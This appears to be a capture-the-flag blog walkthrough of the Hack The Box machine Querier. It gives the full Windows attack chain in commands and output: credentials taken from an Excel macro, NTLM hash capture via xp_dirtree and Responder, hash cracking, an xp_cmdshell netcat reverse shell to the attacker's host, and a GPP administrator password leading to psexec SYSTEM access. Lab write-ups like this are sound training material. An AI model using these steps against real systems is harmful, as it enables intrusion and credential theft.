Home Hack The Box - Querier
Post
Cancel

Hack The Box - Querier

Querier was a medium box that involved retrieving MSSQL database credentials after analyzing macro-enabled Excel workbook. These credentials were then used to establish a connection to the MSSQL database via impacket-mssqlclient as a limited user through which we obtain the NEt-NTLMv2 hash from the responder. PowerUp.ps1 then retrieved administrator credentials from a GPP file, and we got the shell as administrator.

NMAP

Nmap scan shows multiple open ports, including a Microsoft SQL Server 2017

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
$sudo nmap -p- -sC -sV --min-rate 10000 -oN querier.nmap 10.10.10.125
Starting Nmap 7.92 ( https://nmap.org ) at 2023-02-04 19:46 +0545
Nmap scan report for 10.10.10.125
Host is up (0.070s latency).
Not shown: 65518 closed tcp ports (reset)
PORT      STATE    SERVICE       VERSION
135/tcp   open     msrpc         Microsoft Windows RPC
139/tcp   open     netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open     microsoft-ds?
1433/tcp  open     ms-sql-s      Microsoft SQL Server 2017 14.00.1000.00; RTM
| ms-sql-ntlm-info:
|   Target_Name: HTB
|   NetBIOS_Domain_Name: HTB
|   NetBIOS_Computer_Name: QUERIER
|   DNS_Domain_Name: HTB.LOCAL
|   DNS_Computer_Name: QUERIER.HTB.LOCAL
|   DNS_Tree_Name: HTB.LOCAL
|_  Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2023-02-04T13:59:11
|_Not valid after:  2053-02-04T13:59:11
|_ssl-date: 2023-02-04T14:02:33+00:00; -11s from scanner time.
5005/tcp  filtered avt-profile-2
5985/tcp  open     http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
26583/tcp filtered unknown
47001/tcp open     http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open     msrpc         Microsoft Windows RPC
49665/tcp open     msrpc         Microsoft Windows RPC
49666/tcp open     msrpc         Microsoft Windows RPC
49667/tcp open     msrpc         Microsoft Windows RPC
49668/tcp open     msrpc         Microsoft Windows RPC
49669/tcp open     msrpc         Microsoft Windows RPC
49670/tcp open     msrpc         Microsoft Windows RPC
49671/tcp open     msrpc         Microsoft Windows RPC
51547/tcp filtered unknown
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
|   date: 2023-02-04T14:02:24
|_  start_date: N/A
| ms-sql-info:
|   10.10.10.125:1433:
|     Version:
|       name: Microsoft SQL Server 2017 RTM
|       number: 14.00.1000.00
|       Product: Microsoft SQL Server 2017
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
|_clock-skew: mean: -11s, deviation: 0s, median: -12s
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled but not required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 75.01 seconds

SMB ENUMERATION

Using smbclient null authentication to list down shares.

1
2
3
4
5
6
7
8
9
 $smbclient -N -L //10.10.10.125

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        Reports         Disk
SMB1 disabled -- no workgroup available

Inside the Reports share, there’s a single file Currency Volume Report.xlsm

1
2
3
4
5
6
7
8
9
$smbclient //10.10.10.125/Reports 
Password for [WORKGROUP\niraz]:
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Tue Jan 29 05:08:48 2019
  ..                                  D        0  Tue Jan 29 05:08:48 2019
  Currency Volume Report.xlsm         A    12229  Mon Jan 28 04:06:34 2019

                5158399 blocks of size 4096. 848080 blocks available

Downloading the report to our local machine.

1
2
3
4
5
6
7
8
9
10
11
12
$smbclient -N //10.10.10.125/Reports 
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Tue Jan 29 05:08:48 2019
  ..                                  D        0  Tue Jan 29 05:08:48 2019
  Currency Volume Report.xlsm         A    12229  Mon Jan 28 04:06:34 2019

                5158399 blocks of size 4096. 852223 blocks available
smb: \> mget *
Get file Currency Volume Report.xlsm? y
getting file \Currency Volume Report.xlsm of size 12229 as Currency Volume Report.xlsm (35.5 KiloBytes/sec) (average 35.5 KiloBytes/sec)

ANALYSIS OF CURRENCY VOLUME REPORT.XLSM

A .xlsm file is a type of Microsoft Excel workbook that contains macros.We can use olevba to analyse this file.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
$olevba Currency\ Volume\ Report.xlsm
olevba 0.60 on Python 3.9.2 - http://decalage.info/python/oletools
===============================================================================
FILE: Currency Volume Report.xlsm
Type: OpenXML
WARNING  For now, VBA stomping cannot be detected for files in memory
-------------------------------------------------------------------------------
VBA MACRO ThisWorkbook.cls
in file: xl/vbaProject.bin - OLE stream: 'VBA/ThisWorkbook'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

' macro to pull data for client volume reports
'
' further testing required

Private Sub Connect()

Dim conn As ADODB.Connection
Dim rs As ADODB.Recordset

Set conn = New ADODB.Connection
conn.ConnectionString = "Driver={SQL Server};Server=QUERIER;Trusted_Connection=no;Database=volume;Uid=reporting;Pwd=PcwTWTHRwryjc$c6"
conn.ConnectionTimeout = 10
conn.Open

If conn.State = adStateOpen Then

  ' MsgBox "connection successful"

  'Set rs = conn.Execute("SELECT * @@version;")
  Set rs = conn.Execute("SELECT * FROM volume;")
  Sheets(1).Range("A1").CopyFromRecordset rs
  rs.Close

End If

End Sub
-------------------------------------------------------------------------------
VBA MACRO Sheet1.cls
in file: xl/vbaProject.bin - OLE stream: 'VBA/Sheet1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
+----------+--------------------+---------------------------------------------+
|Type      |Keyword             |Description                                  |
+----------+--------------------+---------------------------------------------+
|Suspicious|Open                |May open a file                              |
|Suspicious|Hex Strings         |Hex-encoded strings were detected, may be    |
|          |                    |used to obfuscate strings (option --decode to|
|          |                    |see all)                                     |
+----------+--------------------+---------------------------------------------+

EASTABLISHING MSSQL CONNECTION THROUGH MSSQLCLIENT

we cab use mssqlclient.py from impacket to connect to the database.

1
2
3
4
5
6
7
8
9
10
11
12
13
$python3 mssqlclient.py [email protected] -windows-auth
Impacket v0.10.1.dev1+20230120.195338.34229464 - Copyright 2022 Fortra

Password:
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: volume
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(QUERIER): Line 1: Changed database context to 'volume'.
[*] INFO(QUERIER): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 3232)
[!] Press help for extra shell commands
SQL>

once connected, we can now run query to the database.

1
2
3
4
5
SQL> SELECT * FROM fn_my_permissions(NULL, 'SERVER');
entity_name    subentity_name    permission_name
------------   ---------------   ------------------
server                           CONNECT SQL
server                           VIEW ANY DATABASE
1
2
3
4
5
6
7
8
SQL> SELECT name FROM master.sys.databases
name
-------------------------------------------------------------------------------------------------------------------------------
master
tempdb
model
msdb
volume

xp_dirtree is a stored procedure in Microsoft SQL Server that provides a way to retrieve a list of files and directories within a specified directory path. We’ll use xp_dirtee to load a file from our SMB share. This way, Net-NTLMv2 hash will be captured by the responder when the server tries to authenticate to my host.

1
2
3
SQL> xp_dirtree '\\10.10.14.11\test';
subdirectory    depth
-------------   -----------
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
$sudo responder -I tun0
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 3.0.6.0

  Author: Laurent Gaffie ([email protected])
  To kill this script hit CTRL-C


[+] Poisoners:
    LLMNR                      [ON]
    NBT-NS                     [ON]
    DNS/MDNS                   [ON]

[+] Servers:
    HTTP server                [ON]
    HTTPS server               [ON]
    WPAD proxy                 [OFF]
    Auth proxy                 [OFF]
    SMB server                 [ON]
    Kerberos server            [ON]
    SQL server                 [ON]
    FTP server                 [ON]
    IMAP server                [ON]
    POP3 server                [ON]
    SMTP server                [ON]
    DNS server                 [ON]
    LDAP server                [ON]
    RDP server                 [ON]
    DCE-RPC server             [ON]
    WinRM server               [ON]

[+] HTTP Options:
    Always serving EXE         [OFF]
    Serving EXE                [OFF]
    Serving HTML               [OFF]
    Upstream Proxy             [OFF]

[+] Poisoning Options:
    Analyze Mode               [OFF]
    Force WPAD auth            [OFF]
    Force Basic Auth           [OFF]
    Force LM downgrade         [OFF]
    Fingerprint hosts          [OFF]

[+] Generic Options:
    Responder NIC              [tun0]
    Responder IP               [10.10.14.11]
    Challenge set              [random]
    Don't Respond To Names     ['ISATAP']

[+] Current Session Variables:
    Responder Machine Name     [WIN-080BVO53VJ6]
    Responder Domain Name      [5LWK.LOCAL]
    Responder DCE-RPC Port     [45564]
[!] Error starting TCP server on port 3389, check permissions or other servers running.

[+] Listening for events...

[SMB] NTLMv2-SSP Client   : 10.10.10.125
[SMB] NTLMv2-SSP Username : QUERIER\mssql-svc
[SMB] NTLMv2-SSP Hash     : mssql-svc::QUERIER:d02ec612c5a555b3:9F5C20033BF0D5C395F84B10229DFBDC:01010000000000008098843AD838D9018AAD0038DFFC50E7000000000200080035004C0057004B0001001E00570049004E002D00300038003000420056004F003500330056004A00360004003400570049004E002D00300038003000420056004F003500330056004A0036002E0035004C0057004B002E004C004F00430041004C000300140035004C0057004B002E004C004F00430041004C000500140035004C0057004B002E004C004F00430041004C00070008008098843AD838D901060004000200000008003000300000000000000000000000003000005E3D6425BEDABAD60351015493021F33D9FAB339BE7DCAF0634896891740263D0A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E0031003100000000000000000000000000

CRACK NetNTMLv2

using hashcat to crack NetNTMLv2 hash.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
$hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt

MSSQL-SVC::QUERIER:d02ec612c5a555b3:9f5c20033bf0d5c395f84b10229dfbdc:01010000000000008098843ad838d9018aad0038dffc50e7000000000200080035004c0057004b0001001e00570049004e002d00300038003000420056004f003500330056004a00360004003400570049004e002d00300038003000420056004f003500330056004a0036002e0035004c0057004b002e004c004f00430041004c000300140035004c0057004b002e004c004f00430041004c000500140035004c0057004b002e004c004f00430041004c00070008008098843ad838d901060004000200000008003000300000000000000000000000003000005e3d6425bedabad60351015493021f33d9fab339be7dcaf0634896891740263d0a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e0031003100000000000000000000000000:corporate568


Session..........: hashcat
Status...........: Cracked
Hash.Name........: NetNTLMv2
Hash.Target......: MSSQL-SVC::QUERIER:d02ec612c5a555b3:9f5c20033bf0d5c...000000
Time.Started.....: Sat Feb  4 20:43:12 2023 (15 secs)
Time.Estimated...: Sat Feb  4 20:43:27 2023 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   585.4 kH/s (4.70ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 8962048/14344385 (62.48%)
Rejected.........: 0/8962048 (0.00%)
Restore.Point....: 8957952/14344385 (62.45%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: correita.54 -> coreyr1

Started: Sat Feb  4 20:42:19 2023
Stopped: Sat Feb  4 20:43:29 2023

LOG IN AS MSSQL-SRV

we can now login as mssql-svc account with username mssql-src and password corporate568

1
2
3
4
5
6
7
8
9
10
11
12
13
$python3 mssqlclient.py [email protected] -windows-auth
Impacket v0.10.1.dev1+20230120.195338.34229464 - Copyright 2022 Fortra

Password:
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(QUERIER): Line 1: Changed database context to 'master'.
[*] INFO(QUERIER): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 3232)
[!] Press help for extra shell commands
SQL>

while trying to run commands, it didnot let us run commands as xp_cmdshell was not enabled.

1
2
SQL> xp_cmdshell whoami
[-] ERROR(QUERIER): Line 1: SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the security configuration for this server. A system administrator can enable the use of 'xp_cmdshell' by using sp_configure. For more information about enabling 'xp_cmdshell', search for 'xp_cmdshell' in SQL Server Books Online.

we can use enable_xp_cmdshell that enable us to run commands.

1
2
3
4
5
6
7
8
9
SQL> enable_xp_cmdshell
[*] INFO(QUERIER): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
[*] INFO(QUERIER): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL> xp_cmdshell whoami
output

--------------------------------------------------------------------------------

querier\mssql-svc

SHELL AS MSSQL-SVC

To get shell on the box, we’ll host nc64.exe binary on our smb server. we are also hosting PowerUp.ps1 which we’ll use later for enumeration.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
$ls
nc64.exe   PowerUp.ps1
$sudo impacket-smbserver share . -smb2support
Impacket v0.10.1.dev1+20230120.195338.34229464 - Copyright 2022 Fortra

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.10.125,49696)
[*] AUTHENTICATE_MESSAGE (QUERIER\mssql-svc,QUERIER)
[*] User QUERIER\mssql-svc authenticated successfully
[*] mssql-svc::QUERIER:aaaaaaaaaaaaaaaa:0c02ceff915f9f1f61f3318245331ed6:010100000000000080b309290d39d9016e147c741a2f604b00000000010010007200670053006f007200490070005900030010007200670053006f00720049007000590002001000620052006e005300690071005800620004001000620052006e00530069007100580062000700080080b309290d39d901060004000200000008003000300000000000000000000000003000005e3d6425bedabad60351015493021f33d9fab339be7dcaf0634896891740263d0a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e0031003100000000000000000000000000

now, again we will use xp_cmdshell, this time it will execute nc64.exe from our smbserver. we will also start a nc listener on our box .

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
$sudo impacket-mssqlclient [email protected] -windows-auth
Impacket v0.10.1.dev1+20230120.195338.34229464 - Copyright 2022 Fortra

Password:
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(QUERIER): Line 1: Changed database context to 'master'.
[*] INFO(QUERIER): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 3232)
[!] Press help for extra shell commands
SQL> enable_xp_cmdshell
[*] INFO(QUERIER): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
[*] INFO(QUERIER): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL> xp_cmdshell \\10.10.14.11\share\nc64.exe -e cmd.exe 10.10.14.11 4444 
output

and we got the shell as mssql-svc.

1
2
3
4
5
6
7
8
$sudo rlwrap nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.10.125] 49697
Microsoft Windows [Version 10.0.17763.292]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
querier\mssql-svc

SHELL AS ADMINISTRATOR

Downloading PowerUp.ps1 on the box.

1
C:\Users\mssql-svc\Desktop>copy \\10.10.14.11\share\PowerUp.ps1

switching our shell to powershell.

1
2
3
4
C:\Windows\system32> powershell 
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Users\mssql-svc\Desktop>

importing PowerUp.ps1

1
PS C:\Users\mssql-svc\Desktop>. .\PowerUp.ps1

now we can run Invoke-AllChecks

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
PS C:\Users\mssql-svc\Desktop> Invoke-AllChecks 


Privilege   : SeImpersonatePrivilege
Attributes  : SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
TokenHandle : 2132
ProcessId   : 3316
Name        : 3316
Check       : Process Token Privileges

ServiceName   : UsoSvc
Path          : C:\Windows\system32\svchost.exe -k netsvcs -p
StartName     : LocalSystem
AbuseFunction : Invoke-ServiceAbuse -Name 'UsoSvc'
CanRestart    : True
Name          : UsoSvc
Check         : Modifiable Services

ModifiablePath    : C:\Users\mssql-svc\AppData\Local\Microsoft\WindowsApps
IdentityReference : QUERIER\mssql-svc
Permissions       : {WriteOwner, Delete, WriteAttributes, Synchronize...}
%PATH%            : C:\Users\mssql-svc\AppData\Local\Microsoft\WindowsApps
Name              : C:\Users\mssql-svc\AppData\Local\Microsoft\WindowsApps
Check             : %PATH% .dll Hijacks
AbuseFunction     : Write-HijackDll -DllPath 'C:\Users\mssql-svc\AppData\Local\Microsoft\WindowsApps\wlbsctrl.dll'

UnattendPath : C:\Windows\Panther\Unattend.xml
Name         : C:\Windows\Panther\Unattend.xml
Check        : Unattended Install Files

Changed   : {2019-01-28 23:12:48}
UserNames : {Administrator}
NewName   : [BLANK]
Passwords : {MyUnclesAreMarioAndLuigi!!1!}
File      : C:\ProgramData\Microsoft\Group
            Policy\History\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\Groups\Groups.xml
Check     : Cached GPP Files

Here, we got credentials for administratror through Groups.xml

using impacket-psexec to login to the administrator user.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
$sudo impacket-psexec [email protected]
Impacket v0.10.1.dev1+20230120.195338.34229464 - Copyright 2022 Fortra

Password:
[*] Requesting shares on 10.10.10.125.....
[*] Found writable share ADMIN$
[*] Uploading file OlkQmibA.exe
[*] Opening SVCManager on 10.10.10.125.....
[*] Creating service rDqZ on 10.10.10.125.....
[*] Starting service rDqZ.....
[!] Press help for extra shell commands                                                                                                                           Microsoft Windows [Version 10.0.17763.292]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami                  
nt authority\system


C:\Windows\system32>type C:\Users\Administrator\Desktop\root.txt
0def3d8ef83671c3a7aa76c58626ead1
This post is licensed under CC BY 4.0 by the author.

eLearnSecurity - eJPTv2

Hack The Box - Photobomb

Comments powered by Disqus.